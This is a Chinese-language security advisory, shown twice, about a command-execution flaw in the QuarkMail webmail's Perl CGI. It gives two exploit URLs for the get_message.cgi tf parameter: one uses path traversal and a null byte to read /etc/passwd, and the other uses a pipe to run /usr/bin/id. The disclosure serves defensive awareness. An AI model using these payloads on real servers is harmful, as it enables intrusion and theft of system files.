VULHUB ™

快客电邮（QuarkMail）是北京雄智伟业科技公司推出的电子邮件系统，被广泛用于各个领域的电子邮件解决方案，其webmail部分使用perl cgi编写，但是80sec在其系统中发现一个重大的安全漏洞，导致远程用户可以在邮件系统上以当前进程身份执行任意命令，从而进一步控制主机或者系统。 QuarkMail错误地使用perl的open函数以打开文件，实现模板等功能，但是其对用户传入的参数没有做有效的过滤，从而导致一个命令执行漏洞。 登录进入系统之后访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../etc/passwd%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可得到系统账户文件，访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../usr/bin/id|%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可以将/usr/bin/id文件打开执行，并且将结果返回，用户就可以利用一序列操作获得系统的完整访问权。 QuarkMail 请等待官方补丁。 <a href=http://www.ipmotor.com/ target=_blank>http://www.ipmotor.com/</a>

快客电邮（QuarkMail）是北京雄智伟业科技公司推出的电子邮件系统，被广泛用于各个领域的电子邮件解决方案，其webmail部分使用perl cgi编写，但是80sec在其系统中发现一个重大的安全漏洞，导致远程用户可以在邮件系统上以当前进程身份执行任意命令，从而进一步控制主机或者系统。 QuarkMail错误地使用perl的open函数以打开文件，实现模板等功能，但是其对用户传入的参数没有做有效的过滤，从而导致一个命令执行漏洞。 登录进入系统之后访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../etc/passwd%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可得到系统账户文件，访问如下URL http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&amp;fd=inbox&amp;p=1&amp;l=10&amp;max=2&amp;lang=gb&amp;tf=../../../../../../../usr/bin/id|%00&amp;id=2&amp;sort=0&amp;read_flag=yes 即可以将/usr/bin/id文件打开执行，并且将结果返回，用户就可以利用一序列操作获得系统的完整访问权。 QuarkMail 请等待官方补丁。 <a href=http://www.ipmotor.com/ target=_blank>http://www.ipmotor.com/</a>